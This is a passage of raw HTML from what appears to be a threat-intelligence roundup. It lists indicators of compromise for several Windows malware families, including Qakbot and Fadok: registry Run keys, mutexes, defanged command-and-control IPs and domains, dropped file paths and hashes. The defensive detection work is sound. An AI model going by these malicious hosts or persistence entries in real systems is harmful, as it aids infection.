/&gt;&lt;h4&gt;Coverage&lt;/h4&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://4.bp.blogspot.com/-WcjQB5z7azY/WPEvFYVUpfI/AAAAAAAAA2o/9A2DqIoERHYxdyq2wats6A7E36it0gBdACLcB/s400/no-netsec.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="297" src="https://4.bp.blogspot.com/-WcjQB5z7azY/WPEvFYVUpfI/AAAAAAAAA2o/9A2DqIoERHYxdyq2wats6A7E36it0gBdACLcB/s400/no-netsec.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;h4&gt;Screenshots of Detection&lt;/h4&gt;&lt;b&gt;AMP&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://4.bp.blogspot.com/-gI74odWAeYs/WTrU6GJQ1gI/AAAAAAAABDQ/uL_eiO46oUciMXccBAbsdN_oDpNa42CZACLcB/s1600/Doc_Macro_Valyria_6327969_0_amp.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="481" data-original-width="702" height="272" src="https://4.bp.blogspot.com/-gI74odWAeYs/WTrU6GJQ1gI/AAAAAAAABDQ/uL_eiO46oUciMXccBAbsdN_oDpNa42CZACLcB/s400/Doc_Macro_Valyria_6327969_0_amp.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;b&gt;ThreatGrid&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://2.bp.blogspot.com/-3RFukyX5_tY/WTrVAfpNdDI/AAAAAAAABDU/HASztvDNtzUQRWRXDgOuHalpHSVSrKM1QCLcB/s1600/Doc_Macro_Valyria_6327969_0_threatgrid.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="807" data-original-width="1237" height="260" src="https://2.bp.blogspot.com/-3RFukyX5_tY/WTrVAfpNdDI/AAAAAAAABDU/HASztvDNtzUQRWRXDgOuHalpHSVSrKM1QCLcB/s400/Doc_Macro_Valyria_6327969_0_threatgrid.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;b&gt;Umbrella&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://4.bp.blogspot.com/-JvAUug2-XLI/WTrVD4gRy4I/AAAAAAAABDY/DNOEQwPvDS0ajXHnfMmUFbWBIGFEgAH7QCLcB/s1600/Doc_Macro_Valyria_6327969_0_umbrella.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="733" data-original-width="919" height="318" src="https://4.bp.blogspot.com/-JvAUug2-XLI/WTrVD4gRy4I/AAAAAAAABDY/DNOEQwPvDS0ajXHnfMmUFbWBIGFEgAH7QCLcB/s400/Doc_Macro_Valyria_6327969_0_umbrella.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;b&gt;Screenshot&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://2.bp.blogspot.com/-QaIWFpuRKUw/WTrVJ06KTOI/AAAAAAAABDc/rby5tFObpUsPAry70s7vgGsxMHK7T-1cwCLcB/s1600/Doc_Macro_Valyria_6327969_0_malware.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="442" data-original-width="612" height="288" src="https://2.bp.blogspot.com/-QaIWFpuRKUw/WTrVJ06KTOI/AAAAAAAABDc/rby5tFObpUsPAry70s7vgGsxMHK7T-1cwCLcB/s400/Doc_Macro_Valyria_6327969_0_malware.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;hr /&gt;&lt;br /&gt;&lt;h3&gt;Win.Trojan.Loader-6328419-0&lt;/h3&gt;&lt;h4&gt;Indicators of Compromise&lt;/h4&gt;&lt;br /&gt;&lt;b&gt;Registry Keys&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKCU&amp;gt;\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN&lt;/b&gt;&lt;/li&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;Value: &lt;/b&gt;GITSecureService&lt;/li&gt;&lt;/ul&gt;&lt;/ul&gt;&lt;b&gt;Mutexes&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;LoaderMutex&lt;/li&gt;&lt;li&gt;Local\WininetStartupMutex&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;IP Addresses&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;N/A&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Domain Names&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;N/A&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Files and or directories created&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;N/A&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;File Hashes&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;594e51c5d358d6a691ff2a80dffaddff77c9184ea072e415138c3d41b7c265ca&lt;/li&gt;&lt;li&gt;70df78ea8ee5f9f4561cbb595ca7c2acc982b3a0b7f84017a803e2a0d0494c5a&lt;/li&gt;&lt;li&gt;47bf1580e8407e9825d40348143ee14bb3f7458c32a367ae1a25f3a33a643a4f&lt;/li&gt;&lt;li&gt;503e751cc1c67c0688e92c28e4565de1448756443fdec4a638a019bd63816b33&lt;/li&gt;&lt;li&gt;f228c82dcc233e42f098ef132796985e7e69ab0294e348182ed1fc79f9f49808&lt;/li&gt;&lt;li&gt;6fbf8a11f59e67a96bc1f6afd67fb4b5213f93ca15d75e14bc3b99ca5af37a5d&lt;/li&gt;&lt;li&gt;c703896a92a7912a109336d28dec6dfbf568f8da63c635206d85c72fb2c4aea0&lt;/li&gt;&lt;li&gt;5b5de2fa244760de8a1a301347ab7a646160c257628f24f19d5072ba8d14d3fe&lt;/li&gt;&lt;li&gt;eb483d4f8c71a234f70b490bb38d841c72453ed5c9bb0049d9affd2afe41cf23&lt;/li&gt;&lt;li&gt;c8f06a449c4ba38e5f49b188fdddb2b49a5e7dc8716aa1f220c9ee40b06013a6&lt;/li&gt;&lt;li&gt;6ce02da8b29683da3c62719959522227598d38f3fc7eb056807c0fe83f051720&lt;/li&gt;&lt;li&gt;f99385fa291e583b905bc5880a2d7a8789e9ac12d377beff7ab6afeba26f087c&lt;/li&gt;&lt;li&gt;859cbf1bcb8a1d4b9862e9da10b0e7b760c249ee83b01ae93c72176c021693f5&lt;/li&gt;&lt;li&gt;25a60570b487f02fc57962f8fbf1d859f5cff0f8b47f01e57c7ba2d9c9a3c990&lt;/li&gt;&lt;li&gt;23b62deaab5754b330be64cfb4e784cf2ac328356b767bace69a391219d577a5&lt;/li&gt;&lt;li&gt;e9049130d4cee840324995b87d605672570c19e7d3621e1fd639b640876fa575&lt;/li&gt;&lt;li&gt;77b3f7eb328cb5f503bee90e65789a78be85a73977ecdaeb95c558d7bdb192bb&lt;/li&gt;&lt;li&gt;47a17129b7c2337735cad5c8f9694fc2ae5b344a0ca50647c8a5884b240a8587&lt;/li&gt;&lt;/ul&gt;&lt;br /&gt;&lt;h4&gt;Coverage&lt;/h4&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://3.bp.blogspot.com/-tSS3VoI1eOo/WPEtzFghLhI/AAAAAAAAA2c/sELBUbsbhFAhWd_8GeacC_PrQGegGhZGQCLcB/s400/all.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="297" src="https://3.bp.blogspot.com/-tSS3VoI1eOo/WPEtzFghLhI/AAAAAAAAA2c/sELBUbsbhFAhWd_8GeacC_PrQGegGhZGQCLcB/s400/all.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;h4&gt;Screenshots of Detection&lt;/h4&gt;&lt;b&gt;AMP&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://2.bp.blogspot.com/-n8E_MAp-lrc/WTrVjPSr4RI/AAAAAAAABDg/IcglYepbRHg-GSKwZMGrr9JP0aTCjFmmQCLcB/s1600/eb483d4f8c71a234f70b490bb38d841c72453ed5c9bb0049d9affd2afe41cf23_amp.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="481" data-original-width="702" height="272" src="https://2.bp.blogspot.com/-n8E_MAp-lrc/WTrVjPSr4RI/AAAAAAAABDg/IcglYepbRHg-GSKwZMGrr9JP0aTCjFmmQCLcB/s400/eb483d4f8c71a234f70b490bb38d841c72453ed5c9bb0049d9affd2afe41cf23_amp.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;b&gt;ThreatGrid&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://2.bp.blogspot.com/-e_EN_mnnEnQ/WTrVtUNhnHI/AAAAAAAABDk/DJ9wMsMxVXUnhJeiImtW8nbA5JkTfC0TACLcB/s1600/eb483d4f8c71a234f70b490bb38d841c72453ed5c9bb0049d9affd2afe41cf23_threatgrid.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="855" data-original-width="742" height="400" src="https://2.bp.blogspot.com/-e_EN_mnnEnQ/WTrVtUNhnHI/AAAAAAAABDk/DJ9wMsMxVXUnhJeiImtW8nbA5JkTfC0TACLcB/s400/eb483d4f8c71a234f70b490bb38d841c72453ed5c9bb0049d9affd2afe41cf23_threatgrid.png" width="346" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;b&gt;Umbrella&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://1.bp.blogspot.com/-Lx0G3pNJivE/WTrVyJWsGhI/AAAAAAAABDo/HdvP1kjuSE8gMU3bgsuxwHUyFSosV7PQACLcB/s1600/eb483d4f8c71a234f70b490bb38d841c72453ed5c9bb0049d9affd2afe41cf23_umbrella.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="508" data-original-width="1403" height="143" src="https://1.bp.blogspot.com/-Lx0G3pNJivE/WTrVyJWsGhI/AAAAAAAABDo/HdvP1kjuSE8gMU3bgsuxwHUyFSosV7PQACLcB/s400/eb483d4f8c71a234f70b490bb38d841c72453ed5c9bb0049d9affd2afe41cf23_umbrella.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;hr /&gt;&lt;br /&gt;&lt;h3&gt;Win.Trojan.Sivis-1&lt;/h3&gt;&lt;h4&gt;Indicators of Compromise&lt;/h4&gt;&lt;br /&gt;&lt;b&gt;Registry Keys&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;N/A&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Mutexes&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;N/A&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;IP Addresses&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;N/A&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Domain Names&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;N/A&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Files and or directories created&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\8HMRCBCR\menu_bleacher[1].png&lt;/li&gt;&lt;li&gt;\Documents and Settings\Administrator\Local Settings\Application Data\Mozilla\Firefox\Profiles\z7t0o5cs.default\XUL.mfl&lt;/li&gt;&lt;li&gt;\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\8HMRCBCR\resultslist[1].js&lt;/li&gt;&lt;li&gt;\Documents and Settings\Administrator\Local Settings\Temp\KB2533523_20160610_170929140-Microsoft .NET Framework 4 Extended-MSP0.txt&lt;/li&gt;&lt;li&gt;%AppData%\Microsoft\Office\PowerP12.pip&lt;/li&gt;&lt;li&gt;\Documents and Settings\Administrator\Favorites\Links\Suggested Sites.url&lt;/li&gt;&lt;li&gt;%AppData%\Mozilla\Firefox\Profiles\z7t0o5cs.default\extensions.cache&lt;/li&gt;&lt;li&gt;%AppData%\Microsoft\Access\System.mdw&lt;/li&gt;&lt;li&gt;%AppData%\Mozilla\Firefox\Profiles\z7t0o5cs.default\mimeTypes.rdf&lt;/li&gt;&lt;li&gt;\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Feeds Cache\YB1OPN1Z\desktop.ini&lt;/li&gt;&lt;li&gt;\Documents and Settings\Administrator\Cookies\LJOW70BN.txt&lt;/li&gt;&lt;li&gt;%AppData%\Mozilla\Firefox\Profiles\z7t0o5cs.default\content-prefs.sqlite&lt;/li&gt;&lt;li&gt;\AUTOEXEC.BAT&lt;/li&gt;&lt;li&gt;\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\8HMRCBCR\view[1].txt&lt;/li&gt;&lt;li&gt;[...]&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;File Hashes&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;38f441a14f81c370d0ac0934340d3d196bca832668ee6772ac88330614a91b2c&lt;/li&gt;&lt;li&gt;ccbf43a2ab8074ca4a27952f0f3c052435ffe38cfa4644f63b609f96c978c014&lt;/li&gt;&lt;li&gt;0a08a78e10ffd4c2e176e089e092f3692b94da97457abcfc694082c525335fcf&lt;/li&gt;&lt;li&gt;0c1170f0bd12ecd8b4a507755dff78ea47d9057129d5ae09b2af82287b43664d&lt;/li&gt;&lt;li&gt;7366a0faef62af909a1ef1da05e2cbd1fc9534cbb26e20e90538e043f4517d5c&lt;/li&gt;&lt;li&gt;4e5297e0d0b8c702e6c97fbaeee1f329b2246a046790e0e8adb595f94accf47e&lt;/li&gt;&lt;/ul&gt;&lt;br /&gt;&lt;h4&gt;Coverage&lt;/h4&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://4.bp.blogspot.com/-lMcm16MfzdA/WRTPVW_BAII/AAAAAAAAA9I/TUwW9Ai4QFAh5FURDnAbZJXWJ_Pc0etyACLcB/s1600/amp-esa-proxy-tg.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="297" src="https://4.bp.blogspot.com/-lMcm16MfzdA/WRTPVW_BAII/AAAAAAAAA9I/TUwW9Ai4QFAh5FURDnAbZJXWJ_Pc0etyACLcB/s1600/amp-esa-proxy-tg.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;h4&gt;Screenshots of Detection&lt;/h4&gt;&lt;b&gt;AMP&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://4.bp.blogspot.com/-2etco_P4f8g/WTrYiGyHSZI/AAAAAAAABEI/v-NBFzUKM8k18NVneV6MuJ-CQiwZr0J7ACLcB/s1600/38f441a14f81c370d0ac0934340d3d196bca832668ee6772ac88330614a91b2c_amp.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="481" data-original-width="702" height="272" src="https://4.bp.blogspot.com/-2etco_P4f8g/WTrYiGyHSZI/AAAAAAAABEI/v-NBFzUKM8k18NVneV6MuJ-CQiwZr0J7ACLcB/s400/38f441a14f81c370d0ac0934340d3d196bca832668ee6772ac88330614a91b2c_amp.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;b&gt;ThreatGrid&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://1.bp.blogspot.com/-u_QQ5LL4D7c/WTrYr9R7dfI/AAAAAAAABEM/B_0D10iE3CIcNda7eHzJEJEOi93EVQPRgCLcB/s1600/38f441a14f81c370d0ac0934340d3d196bca832668ee6772ac88330614a91b2c_tg.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="746" data-original-width="1088" height="273" src="https://1.bp.blogspot.com/-u_QQ5LL4D7c/WTrYr9R7dfI/AAAAAAAABEM/B_0D10iE3CIcNda7eHzJEJEOi93EVQPRgCLcB/s400/38f441a14f81c370d0ac0934340d3d196bca832668ee6772ac88330614a91b2c_tg.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;hr /&gt;&lt;br /&gt;&lt;h3&gt;Win.Worm.Fadok-6328944-0&lt;/h3&gt;&lt;h4&gt;Indicators of Compromise&lt;/h4&gt;&lt;br /&gt;&lt;b&gt;Registry Keys&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;HKU\Software\Microsoft\Windows\CurrentVersion\Run&lt;/b&gt;&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Mutexes&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;BFA31D7B-D1D1-40D5-A90C-A0909FFA0887&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;IP Addresses&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;N/A&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Domain Names&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;wxanalytics[.]ru&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Files and or directories created&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;%AppData%\RAC\mls.exe&lt;/li&gt;&lt;li&gt;%AppData%\RAC\svcsc.exe&lt;/li&gt;&lt;li&gt;%AppData%\RAC\svcsc.exe.config&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;File Hashes&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;03692f096e7fc9ab6bd470f7092ae80cc5dcfbf1dcb2a849dae2a2384e421315&lt;/li&gt;&lt;li&gt;04c679e80175039e07cbbd0b87a9877c297ef7e18d117f8dfa7c30ea42f78de1&lt;/li&gt;&lt;li&gt;056b0bc81124cf9ad6c094092e1f16f2aa96bf7efebcaeaf3830a8a228464a9b&lt;/li&gt;&lt;li&gt;06f89aa03b2e1f070b9fdfafd5356d0eaa1ea840f05ab7189d89f1cb1f70ff66&lt;/li&gt;&lt;li&gt;093808faa41383f1e3d33fd8a2e716fe4c5b9388bd42548f5423e6b5ff62a9d6&lt;/li&gt;&lt;li&gt;0ab690ef09a14798b9deb6cd0c116b8e0ed906b6bac16a05a5ae4bc38cabf467&lt;/li&gt;&lt;li&gt;0cac66a5a16efe52e2e878f5e8f6e34749e049c547ecf18f54955141e13e7058&lt;/li&gt;&lt;li&gt;0f93142998d1c0dddcf008b167f9611e0fc46539f50a35faf8266d71d31ad3e6&lt;/li&gt;&lt;li&gt;0fffda2d0105f10690d1989859deae3d50287474534649605a320f078616d658&lt;/li&gt;&lt;li&gt;148c4618e14a3c30f73dd6f910df6999ea4be2e32818f3747bdae03c175b7c48&lt;/li&gt;&lt;/ul&gt;&lt;br /&gt;&lt;h4&gt;Coverage&lt;/h4&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://1.bp.blogspot.com/-8-ewx032dEo/WShN7e2cmKI/AAAAAAAABAg/1zHeN8V4h-sP6aW4ev8jafnU6MW4QEE0wCLcB/s1600/no-email-security.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="297" src="https://1.bp.blogspot.com/-8-ewx032dEo/WShN7e2cmKI/AAAAAAAABAg/1zHeN8V4h-sP6aW4ev8jafnU6MW4QEE0wCLcB/s1600/no-email-security.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;h4&gt;Screenshots of Detection&lt;/h4&gt;&lt;b&gt;AMP&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://1.bp.blogspot.com/-S_eu0nSQ_Rk/WTrXQ6Di5xI/AAAAAAAABDw/SXuG2rhqquIF_K0FGIbP18sk6rETTzYlgCLcB/s1600/093808faa41383f1e3d33fd8a2e716fe4c5b9388bd42548f5423e6b5ff62a9d6_amp.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="481" data-original-width="702" height="272" src="https://1.bp.blogspot.com/-S_eu0nSQ_Rk/WTrXQ6Di5xI/AAAAAAAABDw/SXuG2rhqquIF_K0FGIbP18sk6rETTzYlgCLcB/s400/093808faa41383f1e3d33fd8a2e716fe4c5b9388bd42548f5423e6b5ff62a9d6_amp.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;b&gt;ThreatGrid&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://3.bp.blogspot.com/-GsQ--tfJMEA/WTrb-p3A4NI/AAAAAAAABE0/TdlE7CQfi9k0jmEgBka4e5vXb8a8-0TGACLcB/s1600/d85f7833-8538-4447-bc81-8137004f8257.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="448" data-original-width="1020" height="175" src="https://3.bp.blogspot.com/-GsQ--tfJMEA/WTrb-p3A4NI/AAAAAAAABE0/TdlE7CQfi9k0jmEgBka4e5vXb8a8-0TGACLcB/s400/d85f7833-8538-4447-bc81-8137004f8257.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;b&gt;&lt;span style="color: red;"&gt;&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;b&gt;Umbrella&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://3.bp.blogspot.com/-OzV24rJ6BoI/WTrX_xk0c_I/AAAAAAAABD4/FUWHIt5UBDoLVceq7rM-RDJO1dg4FFLJACLcB/s1600/wxanalytics.ru_umbrella.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="558" data-original-width="1112" height="200" src="https://3.bp.blogspot.com/-OzV24rJ6BoI/WTrX_xk0c_I/AAAAAAAABD4/FUWHIt5UBDoLVceq7rM-RDJO1dg4FFLJACLcB/s400/wxanalytics.ru_umbrella.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;b&gt;Screenshot&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://1.bp.blogspot.com/-KIbjWEE9Urg/WTrYEeJTpaI/AAAAAAAABD8/G1UAKSmNHvkTYsX47FmVPVKgGP8z8JPFgCLcB/s1600/093808faa41383f1e3d33fd8a2e716fe4c5b9388bd42548f5423e6b5ff62a9d6_malware.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="768" data-original-width="1024" height="300" src="https://1.bp.blogspot.com/-KIbjWEE9Urg/WTrYEeJTpaI/AAAAAAAABD8/G1UAKSmNHvkTYsX47FmVPVKgGP8z8JPFgCLcB/s400/093808faa41383f1e3d33fd8a2e716fe4c5b9388bd42548f5423e6b5ff62a9d6_malware.jpg" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;hr /&gt;&lt;br /&gt;&lt;h3&gt;Win.Trojan.Qakbot-6327689-0&lt;/h3&gt;&lt;h4&gt;Indicators of Compromise&lt;/h4&gt;&lt;br /&gt;&lt;b&gt;Registry Keys&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKCU&amp;gt;\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN&lt;/b&gt;&lt;/li&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;Value: &lt;/b&gt;kddds&lt;/li&gt;&lt;/ul&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKCU&amp;gt;\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS&lt;/b&gt;&lt;/li&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;Value: &lt;/b&gt;ProxyOverride&lt;/li&gt;&lt;/ul&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKLM&amp;gt;\SYSTEM\CONTROLSET001\SERVICES\DBRNOCX&lt;/b&gt;&lt;/li&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;Value: &lt;/b&gt;DisplayName&lt;/li&gt;&lt;/ul&gt;&lt;/ul&gt;&lt;b&gt;Mutexes&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;wawrtxtguelkunm&lt;/li&gt;&lt;li&gt;\BaseNamedObjects\Global\uhtvtft&lt;/li&gt;&lt;li&gt;eioigs&lt;/li&gt;&lt;li&gt;\BaseNamedObjects\Global\ubrjqsxr&lt;/li&gt;&lt;li&gt;knsoonoa&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;IP Addresses&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;204[.]79[.]197[.]200&lt;/li&gt;&lt;li&gt;104[.]254[.]150[.]79&lt;/li&gt;&lt;li&gt;52[.]27[.]10[.]213&lt;/li&gt;&lt;li&gt;64[.]95[.]32[.]24&lt;/li&gt;&lt;li&gt;64[.]95[.]32[.]20&lt;/li&gt;&lt;li&gt;107[.]21[.]249[.]100&lt;/li&gt;&lt;li&gt;104[.]16[.]32[.]229&lt;/li&gt;&lt;li&gt;54[.]197[.]40[.]33&lt;/li&gt;&lt;li&gt;54[.]225[.]186[.]185&lt;/li&gt;&lt;li&gt;162[.]144[.]12[.]241&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Domain Names&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;jdlunsnxplknfahqhhcnydvjm[.]net&lt;/li&gt;&lt;li&gt;bofznergcfar[.]biz&lt;/li&gt;&lt;li&gt;yfptiliaesndlcvuemywsvcyh[.]info&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Files and or directories created&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;%AppData%\Microsoft\Knsoono\knsoon.dll&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;File Hashes&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;9a238c95de1ba5bc414aa0fd45297bf79f02b1de03d93a65ad74e91e37eb9ae9&lt;/li&gt;&lt;li&gt;0452810a21fc1207dc11a2a82127f30354fdc41aef95371b77a00b5592c11bb4&lt;/li&gt;&lt;li&gt;02ad78b356cb9723b18122a2fad033e0487be7e367864d7481371bde0b0b8acf&lt;/li&gt;&lt;li&gt;0200b37385ee4b54572e9ff8f9dca6b20ef6a41feefeb9f5eaf14fa35fe82b87&lt;/li&gt;&lt;li&gt;007f9ee2441329fe8c8ebf6f597c84eb1e4fea764dd228cfae9bed400c8af53b&lt;/li&gt;&lt;li&gt;006b191a135afecf86bd4df2fbf619f8f019ab316d2edb33d053209384c7d4cd&lt;/li&gt;&lt;li&gt;00141f6303dd960c61a4fdb06e686ccc972c0e0f092adaf823444e4b7e32ae09&lt;/li&gt;&lt;li&gt;d52f95bb330930af7477604547dd33fdf3fe76e20301a67a7d490f6b1ebe5247&lt;/li&gt;&lt;li&gt;4712cf80102b7886a946ab6454fb0978f9d94feacd52c5df18850dbefa0158ec&lt;/li&gt;&lt;li&gt;5b7a5a58e4af312cd23e1f28597f2818953dd23abdeedb52adb882958e2766cb&lt;/li&gt;&lt;/ul&gt;&lt;br /&gt;&lt;h4&gt;Coverage&lt;/h4&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://4.bp.blogspot.com/-WcjQB5z7azY/WPEvFYVUpfI/AAAAAAAAA2o/9A2DqIoERHYxdyq2wats6A7E36it0gBdACLcB/s400/no-netsec.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="297" 